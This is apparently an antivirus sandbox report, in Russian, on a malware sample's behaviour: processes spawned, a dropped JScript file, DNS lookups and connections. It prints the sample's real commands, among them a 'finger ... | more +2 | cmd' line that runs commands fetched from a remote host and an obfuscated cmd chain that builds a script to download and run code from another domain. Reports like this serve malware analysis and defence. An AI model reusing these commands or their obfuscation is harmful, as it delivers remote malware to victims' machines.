Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\finger.exe' ok@0gounu.homem.buzz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\7HQ.js"
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\7hq.js
Сетевая активность
Подключается к
- '0g####.homem.buzz':79
- 'ue####.ftima.buzz':80
- 'cl###flare.com':443
- 'microsoft.com':80
TCP
- '0g####.homem.buzz':79
- 'cl###flare.com':443
UDP
- DNS ASK 0g####.homem.buzz
- DNS ASK ue####.ftima.buzz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c finger ok@0gounu.homem.buzz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt ZEWV=.j&&SEt MFNWE=vJ7dgarJ7dg a =J7dg 'scJ7dgriJ7dgptJ7dg:'; b =J7dg 'hJ7dgTtPJ7dg:'; GJ7dgetJ7dgObjJ7dgecJ7dgt(J7dga+b+'&&sET KWZH=DVEMGDVEMGueaejd.ftima.buzzDVEMG?1DVEMG')&&sEt/^...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 77P7Q="%MFNWE:J7dg=%%KWZH:DVEMG=/%" 0<nul 1>%LOCALAPPDATA%\7HQ%ZEWV%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\7HQ%ZEWV%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\7HQ.js
